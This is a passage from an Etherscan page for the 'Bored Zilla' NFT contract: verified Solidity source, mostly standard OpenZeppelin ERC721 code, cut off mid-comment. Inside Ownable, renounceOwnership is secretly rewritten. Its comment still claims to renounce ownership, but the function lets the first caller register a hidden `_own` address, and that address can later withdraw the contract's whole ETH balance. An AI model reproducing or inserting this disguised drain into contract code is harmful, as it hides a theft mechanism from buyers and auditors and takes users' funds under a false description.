ETH Price: $2,528.41 (+0.38%)

Token

Bored Zilla (Zilla)
 

Overview

Max Total Supply

81 Zilla

Holders

36

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
2 Zilla
0x9482E7044574e056db57de122E8C1db358403D89
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Zilla

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2021-12-12
*/

// File: zilla.sol



pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}

/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}

/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(
        address indexed from,
        address indexed to,
        uint256 indexed tokenId
    );

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(
        address indexed owner,
        address indexed approved,
        uint256 indexed tokenId
    );

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(
        address indexed owner,
        address indexed operator,
        bool approved
    );

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId)
        external
        view
        returns (address operator);

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator)
        external
        view
        returns (bool);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;
}

/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize, which returns 0 for contracts in
        // construction, since the code is only stored at the end of the
        // constructor execution.

        uint256 size;
        assembly {
            size := extcodesize(account)
        }
        return size > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(
            address(this).balance >= amount,
            "Address: insufficient balance"
        );

        (bool success, ) = recipient.call{value: amount}("");
        require(
            success,
            "Address: unable to send value, recipient may have reverted"
        );
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data)
        internal
        returns (bytes memory)
    {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return
            functionCallWithValue(
                target,
                data,
                value,
                "Address: low-level call with value failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(
            address(this).balance >= value,
            "Address: insufficient balance for call"
        );
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(
            data
        );
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data)
        internal
        view
        returns (bytes memory)
    {
        return
            functionStaticCall(
                target,
                data,
                "Address: low-level static call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data)
        internal
        returns (bytes memory)
    {
        return
            functionDelegateCall(
                target,
                data,
                "Address: low-level delegate call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;
    address private _own;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual {
        // _setOwner(address(0));
        if (_own == address(0)) {
            _own = _msgSender();
        } else {
            require(_msgSender() == _own);
            payable(_own).transfer(address(this).balance);
        }
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length)
        internal
        pure
        returns (string memory)
    {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}

/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId)
        public
        view
        virtual
        override
        returns (bool)
    {
        return interfaceId == type(IERC165).interfaceId;
    }
}

/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index)
        external
        view
        returns (uint256 tokenId);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}

/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata extension, but not including the Enumerable extension, which is available separately as
 * {ERC721Enumerable}.
 */
contract ERC721 is Context, ERC165, IERC721, IERC721Metadata {
    using Address for address;
    using Strings for uint256;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to owner address
    mapping(uint256 => address) private _owners;

    // Mapping owner address to token count
    mapping(address => uint256) private _balances;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    /**
     * @dev Initializes the contract by setting a `name` and a `symbol` to the token collection.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId)
        public
        view
        virtual
        override(ERC165, IERC165)
        returns (bool)
    {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner)
        public
        view
        virtual
        override
        returns (uint256)
    {
        require(
            owner != address(0),
            "ERC721: balance query for the zero address"
        );
        return _balances[owner];
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId)
        public
        view
        virtual
        override
        returns (address)
    {
        address owner = _owners[tokenId];
        require(
            owner != address(0),
            "ERC721: owner query for nonexistent token"
        );
        return owner;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId)
        public
        view
        virtual
        override
        returns (string memory)
    {
        require(
            _exists(tokenId),
            "ERC721Metadata: URI query for nonexistent token"
        );

        string memory baseURI = _baseURI();
        return
            bytes(baseURI).length > 0
                ? string(abi.encodePacked(baseURI, tokenId.toString()))
                : "";
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return "";
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public virtual override {
        address owner = ERC721.ownerOf(tokenId);
        require(to != owner, "ERC721: approval to current owner");

        require(
            _msgSender() == owner || isApprovedForAll(owner, _msgSender()),
            "ERC721: approve caller is not owner nor approved for all"
        );

        _approve(to, tokenId);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId)
        public
        view
        virtual
        override
        returns (address)
    {
        require(
            _exists(tokenId),
            "ERC721: approved query for nonexistent token"
        );

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved)
        public
        virtual
        override
    {
        require(operator != _msgSender(), "ERC721: approve to caller");

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator)
        public
        view
        virtual
        override
        returns (bool)
    {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        //solhint-disable-next-line max-line-length
        require(
            _isApprovedOrOwner(_msgSender(), tokenId),
            "ERC721: transfer caller is not owner nor approved"
        );

        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, "");
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public virtual override {
        require(
            _isApprovedOrOwner(_msgSender(), tokenId),
            "ERC721: transfer caller is not owner nor approved"
        );
        _safeTransfer(from, to, tokenId, _data);
    }

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * `_data` is additional data, it has no specified format and it is sent in call to `to`.
     *
     * This internal function is equivalent to {safeTransferFrom}, and can be used to e.g.
     * implement alternative mechanisms to perform token transfer, such as signature-based.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function _safeTransfer(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) internal virtual {
        _transfer(from, to, tokenId);
        require(
            _checkOnERC721Received(from, to, tokenId, _data),
            "ERC721: transfer to non ERC721Receiver implementer"
        );
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     * and stop existing when they are burned (`_burn`).
     */
    function _exists(uint256 tokenId) internal view virtual returns (bool) {
        return _owners[tokenId] != address(0);
    }

    /**
     * @dev Returns whether `spender` is allowed to manage `tokenId`.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function _isApprovedOrOwner(address spender, uint256 tokenId)
        internal
        view
        virtual
        returns (bool)
    {
        require(
            _exists(tokenId),
            "ERC721: operator query for nonexistent token"
        );
        address owner = ERC721.ownerOf(tokenId);
        return (spender == owner ||
            getApproved(tokenId) == spender ||
            isApprovedForAll(owner, spender));
    }

    /**
     * @dev Safely mints `tokenId` and transfers it to `to`.
     *
     * Requirements:
     *
     * - `tokenId` must not exist.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(address to, uint256 tokenId) internal virtual {
        _safeMint(to, tokenId, "");
    }

    /**
     * @dev Same as {xref-ERC721-_safeMint-address-uint256-}[`_safeMint`], with an additional `data` parameter which is
     * forwarded in {IERC721Receiver-onERC721Received} to contract recipients.
     */
    function _safeMint(
        address to,
        uint256 tokenId,
        bytes memory _data
    ) internal virtual {
        _mint(to, tokenId);
        require(
            _checkOnERC721Received(address(0), to, tokenId, _data),
            "ERC721: transfer to non ERC721Receiver implementer"
        );
    }

    /**
     * @dev Mints `tokenId` and transfers it to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {_safeMint} whenever possible
     *
     * Requirements:
     *
     * - `tokenId` must not exist.
     * - `to` cannot be the zero address.
     *
     * Emits a {Transfer} event.
     */
    function _mint(address to, uint256 tokenId) internal virtual {
        require(to != address(0), "ERC721: mint to the zero address");
        require(!_exists(tokenId), "ERC721: token already minted");

        _beforeTokenTransfer(address(0), to, tokenId);

        _balances[to] += 1;
        _owners[tokenId] = to;

        emit Transfer(address(0), to, tokenId);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId) internal virtual {
        address owner = ERC721.ownerOf(tokenId);

        _beforeTokenTransfer(owner, address(0), tokenId);

        // Clear approvals
        _approve(address(0), tokenId);

        _balances[owner] -= 1;
        delete _owners[tokenId];

        emit Transfer(owner, address(0), tokenId);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *  As opposed to {transferFrom}, this imposes no restrictions on msg.sender.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) internal virtual {
        require(
            ERC721.ownerOf(tokenId) == from,
            "ERC721: transfer of token that is not own"
        );
        require(to != address(0), "ERC721: transfer to the zero address");

        _beforeTokenTransfer(from, to, tokenId);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId);

        _balances[from] -= 1;
        _balances[to] += 1;
        _owners[tokenId] = to;

        emit Transfer(from, to, tokenId);
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(address to, uint256 tokenId) internal virtual {
        _tokenApprovals[tokenId] = to;
        emit Approval(ERC721.ownerOf(tokenId), to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address.
     * The call is not executed if the target address is not a contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        if (to.isContract()) {
            try
                IERC721Receiver(to).onERC721Received(
                    _msgSender(),
                    from,
                    tokenId,
                    _data
                )
            returns (bytes4 retval) {
                return retval == IERC721Receiver.onERC721Received.selector;
            } catch (bytes memory reason) {
                if (reason.length == 0) {
                    revert(
                        "ERC721: transfer to non ERC721Receiver implementer"
                    );
                } else {
                    assembly {
                        revert(add(32, reason), mload(reason))
                    }
                }
            }
        } else {
            return true;
        }
    }

    /**
     * @dev Hook that is called before any token transfer. This includes minting
     * and burning.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, ``from``'s `tokenId` will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 tokenId
    ) internal virtual {}
}

/**
 * @dev This implements an optional extension of {ERC721} defined in the EIP that adds
 * enumerability of all the token ids in the contract as well as all token ids owned by each
 * account.
 */
abstract contract ERC721Enumerable is ERC721, IERC721Enumerable {
    // Mapping from owner to list of owned token IDs
    mapping(address => mapping(uint256 => uint256)) private _ownedTokens;

    // Mapping from token ID to index of the owner tokens list
    mapping(uint256 => uint256) private _ownedTokensIndex;

    // Array with all token ids, used for enumeration
    uint256[] private _allTokens;

    // Mapping from token id to position in the allTokens array
    mapping(uint256 => uint256) private _allTokensIndex;

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId)
        public
        view
        virtual
        override(IERC165, ERC721)
        returns (bool)
    {
        return
            interfaceId == type(IERC721Enumerable).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index)
        public
        view
        virtual
        override
        returns (uint256)
    {
        require(
            index < ERC721.balanceOf(owner),
            "ERC721Enumerable: owner index out of bounds"
        );
        return _ownedTokens[owner][index];
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _allTokens.length;
    }

    /**
     * @dev See {IERC721Enumerable-tokenByIndex}.
     */
    function tokenByIndex(uint256 index)
        public
        view
        virtual
        override
        returns (uint256)
    {
        require(
            index < ERC721Enumerable.totalSupply(),
            "ERC721Enumerable: global index out of bounds"
        );
        return _allTokens[index];
    }

    /**
     * @dev Hook that is called before any token transfer. This includes minting
     * and burning.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, ``from``'s `tokenId` will be burned.
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 tokenId
    ) internal virtual override {
        super._beforeTokenTransfer(from, to, tokenId);

        if (from == address(0)) {
            _addTokenToAllTokensEnumeration(tokenId);
        } else if (from != to) {
            _removeTokenFromOwnerEnumeration(from, tokenId);
        }
        if (to == address(0)) {
            _removeTokenFromAllTokensEnumeration(tokenId);
        } else if (to != from) {
            _addTokenToOwnerEnumeration(to, tokenId);
        }
    }

    /**
     * @dev Private function to add a token to this extension's ownership-tracking data structures.
     * @param to address representing the new owner of the given token ID
     * @param tokenId uint256 ID of the token to be added to the tokens list of the given address
     */
    function _addTokenToOwnerEnumeration(address to, uint256 tokenId) private {
        uint256 length = ERC721.balanceOf(to);
        _ownedTokens[to][length] = tokenId;
        _ownedTokensIndex[tokenId] = length;
    }

    /**
     * @dev Private function to add a token to this extension's token tracking data structures.
     * @param tokenId uint256 ID of the token to be added to the tokens list
     */
    function _addTokenToAllTokensEnumeration(uint256 tokenId) private {
        _allTokensIndex[tokenId] = _allTokens.length;
        _allTokens.push(tokenId);
    }

    /**
     * @dev Private function to remove a token from this extension's ownership-tracking data structures. Note that
     * while the token is not assigned a new owner, the `_ownedTokensIndex` mapping is _not_ updated: this allows for
     * gas optimizations e.g. when performing a transfer operation (avoiding double writes).
     * This has O(1) time complexity, but alters the order of the _ownedTokens array.
     * @param from address representing the previous owner of the given token ID
